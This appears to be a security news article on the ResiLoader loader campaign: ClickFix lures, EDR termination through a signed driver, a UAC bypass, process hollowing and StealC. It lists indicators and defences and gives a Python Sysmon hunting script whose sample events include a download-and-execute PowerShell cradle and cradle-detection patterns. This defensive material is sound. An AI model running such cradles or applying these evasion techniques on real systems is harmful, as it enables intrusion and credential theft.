PROBABLYPWNED
Malware | July 3, 2026 | 3 min read

ResiLoader Kills 140+ Security Tools Before Deploying StealC

Malwarebytes documents a new loader that abuses a legitimate signed driver to terminate EDR processes, then uses process hollowing to inject the StealC infostealer; the chain is delivered through fake Google and Cloudflare verification pages.

James Rivera

A new .NET NativeAOT loader called ResiLoader drops a legitimate driver, uses it to terminate more than 140 antivirus and EDR processes, then injects the StealC infostealer through process hollowing—all triggered by victims who thought they were completing a CAPTCHA.

Malwarebytes researcher Gabriele Orini documented the campaign, which has been running since late 2025 using fake Google reCAPTCHA screens, spoofed Cloudflare "Verify you're human" pages, bogus Google Meet audio-fix notices, and even a fake QR code generator. All roads lead to the same lure: copy this PowerShell command and paste it into your terminal.

The Infection Chain

The delivery mechanism follows the ClickFix pattern we've covered extensively—social engineering users into executing commands they don't understand. Victims encounter what appears to be a verification prompt, complete with familiar Google or Cloudflare branding. The "fix" involves copying a PowerShell snippet that downloads and executes the payload.

In one infection chain Malwarebytes traced, the attack begins with a trojanized version of the legitimate Franz messaging application. The compromised installer downloads ResiLoader, which then orchestrates a multi-stage compromise.

How ResiLoader Disables Security

ResiLoader's first priority is blinding defenders. It drops pcdhost.sys, a signed kernel driver shipped with OPSWAT's AppRemover, a legitimate utility that IT teams use to uninstall security products during migrations. Because the driver runs in the kernel, it can terminate processes that user-mode code cannot: antivirus and EDR services typically run as protected processes or register kernel callbacks that strip PROCESS_TERMINATE from handles opened by ordinary processes, so a TerminateProcess call against them fails even from an administrator. Dropping a vendor-signed driver to get around that protection is the bring-your-own-vulnerable-driver (BYOVD) pattern, applied here to a driver whose process-termination capability is a design feature rather than a bug.

ResiLoader feeds more than 140 process names to the driver, including:

  • Major antivirus engines (Windows Defender, Norton, Kaspersky, etc.)
  • EDR agents (CrowdStrike, SentinelOne, Carbon Black)
  • Forensic and analysis tools

Once security software is disabled, ResiLoader elevates through the ICMLuaUtil COM interface, a well-known UAC bypass: the CMSTPLUA COM server is marked for auto-elevation, so instantiating it through the COM elevation moniker and calling its ShellExec method runs an arbitrary command elevated without the consent prompt, provided UAC is at its default level and the user is a local administrator. Note that Windows does not let a standard-user process load a kernel driver at all, so whichever order the stages are described in, elevation has to succeed before the driver-based kill stage can run. Persistence is a Run registry value named "Google Update", chosen to blend in with legitimate software entries; when reviewing such entries, check the value's target path rather than trusting its name.

Process Hollowing and StealC Deployment

With security tools terminated and persistence established, ResiLoader performs process hollowing on ServiceModelReg.exe, the Windows Communication Foundation registration tool that ships with the .NET Framework. The technique creates the process suspended, unmaps or overwrites its image in memory with the payload, fixes up the entry point, and resumes the main thread. To any monitoring that survived the initial purge, a Microsoft-signed executable appears to be running normally; the tells are that the process's in-memory image no longer matches the file on disk, and that the parent which created it suspended and wrote into its memory is not something that normally launches .NET tooling.

The injected payload is StealC, a capable infostealer that harvests browser credentials, cryptocurrency wallets, session cookies, and authentication tokens.

Multiple Malware Families

StealC isn't the only payload distributed through this infrastructure. Malwarebytes identified seven distinct malware families delivered via the same fake verification campaign:

  • HijackLoader
  • StealC
  • Remus Stealer
  • Amatera Stealer
  • CastleLoader
  • NetSupport (RAT)
  • A Rust-based stealer

The shared infrastructure includes Cloudflare R2 buckets for payload hosting, expired domains that attackers repurchased, and compromised legitimate websites used as redirect points.

Indicators of Compromise

Command & Control:

  • completstep[.]com
  • popularcard[.]shop
  • xzz[.]proxygrid[.]cc

Payload distribution IPs:

  • 151.240.151.126
  • 85.239.149.16
  • 93.152.224.29

File hashes (MD5):

  • ResiLoader DLL: 72907d0ca3258365838626f6a8d993a6
  • StealC: 0234e3188f2883a438b3f2beab7a78b2

Defensive Recommendations

  1. Train users on verification scams - Google, Cloudflare, and Microsoft never ask users to paste commands into a terminal, a command prompt, or the Win+R Run dialog to prove they are human
  2. Restrict and monitor PowerShell launched by users - The pasted command is executed by the user, so its parent is explorer.exe or a console host, not the browser that showed the lure. Application control (AppLocker or WDAC) for standard users, Constrained Language Mode, and alerts on powershell.exe with download-cradle or encoded-command arguments spawned from explorer.exe cut off this vector
  3. Monitor for suspicious driver loads - Sysmon Event ID 6 records every driver load; a kernel driver appearing from a user-writable directory or outside a known software installation warrants investigation, and Microsoft's vulnerable driver blocklist (enforced through WDAC or HVCI) stops known abused drivers from loading
  4. Detect process hollowing - EDR tools should flag process memory that doesn't match its on-disk image, and a process created suspended that receives cross-process memory writes before it is resumed
  5. Monitor Run key modifications - Sysmon Event ID 13 records registry value writes; a new Run value whose target sits outside Program Files or System32 is a persistence entry to investigate, whatever the value is named
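The behaviours described under "How ResiLoader Disables Security" and "Process Hollowing and StealC Deployment" map onto a handful of host telemetry checks, and the recommendations above are easier to act on as rules than as prose. The following is an added example written for this page, not Malwarebytes' detection content or any vendor's rule set. It assumes events are dicts keyed like Sysmon fields (EventID 1 ProcessCreate, 6 DriverLoad, 13 RegistryEvent); the sample events, file paths, the "gupdate.exe" name and the hxxp URL are constructed for the demonstration and do not come from the write-up.

```python
"""Hunting rules for the ResiLoader chain, run over constructed Sysmon-style
events. Added example for this page; the events, paths and names below are
made up, not indicators from the Malwarebytes report."""

import re

# Directories a standard user can write to. A kernel driver or Run-key
# target living here is the signal; real products install under
# Program Files or System32.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\AppData|Temp|ProgramData|Users\\Public)\\", re.I
)

# Download-cradle fragments typical of a pasted ClickFix snippet.
CRADLE = re.compile(
    r"(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|-enc\b|-encodedcommand|frombase64string)", re.I
)

# Signed drivers known to expose process termination to user mode; the page
# names one. A set so further abused drivers can be appended.
ABUSED_DRIVERS = {"pcdhost.sys"}

RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list:
    """Return the names of the rules this event trips (empty if none)."""
    hits = []
    eid = ev.get("EventID")

    if eid == 1:
        image = basename(ev.get("Image", ""))
        parent_path = ev.get("ParentImage", "")
        parent = basename(parent_path)
        cmd = ev.get("CommandLine", "")
        # ClickFix: the user pastes into Win+R or a console, so the parent is
        # explorer.exe or a shell, never the browser that showed the lure.
        if (image in {"powershell.exe", "pwsh.exe"}
                and parent in {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
                and CRADLE.search(cmd)):
            hits.append("clickfix_powershell_cradle")
        # Hollowing target: a benign Microsoft binary spawned by something
        # running out of a user-writable directory (heuristic, assumed).
        if image == "servicemodelreg.exe" and USER_WRITABLE.search(parent_path):
            hits.append("hollowing_target_from_user_dir")

    elif eid == 6:
        drv = ev.get("ImageLoaded", "")
        if basename(drv) in ABUSED_DRIVERS:
            hits.append("edr_killer_driver_loaded")
        if USER_WRITABLE.search(drv):
            hits.append("driver_loaded_from_user_dir")

    elif eid == 13:
        target = ev.get("TargetObject", "")
        details = ev.get("Details", "")
        if RUN_KEY.search(target):
            name = target.rsplit("\\", 1)[-1]
            if USER_WRITABLE.search(details):
                hits.append("run_key_points_to_user_dir")
            # The value name the page reports. The path check above is what
            # really separates it from a genuine Google entry.
            if name.lower() == "google update" and "\\google\\" not in details.lower():
                hits.append("run_key_spoofs_google_update")
    return hits


def hunt(events) -> list:
    """Run every event through the rules; returns (rule, event) pairs."""
    return [(rule, ev) for ev in events for rule in check_event(ev)]


# Constructed sample events mirroring the chain described on this page.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr hxxp://example.invalid/v | iex"'},
    {"EventID": 6, "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\pcdhost.sys",
     "Signature": "OPSWAT, Inc."},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Google Update",
     "Details": r"C:\Users\alice\AppData\Roaming\gupdate.exe"},
    {"EventID": 1,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ServiceModelReg.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\gupdate.exe",
     "CommandLine": "ServiceModelReg.exe"},
    # Benign control: a vendor installer loading a driver from Program Files.
    {"EventID": 6, "ImageLoaded": r"C:\Program Files\Vendor\driver.sys", "Signature": "Vendor"},
]

if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(f"{rule:32} EventID={ev['EventID']}")
```

The path-based checks do the real work: the value name "Google Update", the driver file name and the PowerShell parent are all things an attacker can vary, whereas dropping a driver or a persistence target into a user-writable directory is harder to avoid without already having elevated, durable access. In production these rules belong in the SIEM or EDR query language rather than in a script, but the conditions translate directly.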

Abusing a legitimate signed driver to disable security tools is an established escalation, usually filed under bring-your-own-vulnerable-driver (BYOVD) rather than living-off-the-land binaries, since the driver is not already present on the victim and has to be dropped and loaded. AppRemover exists for IT administrators; attackers weaponized it for the exact opposite of its intended purpose. Expect the pattern to keep expanding as threat actors mine enterprise tooling for signed components with dangerous capabilities.
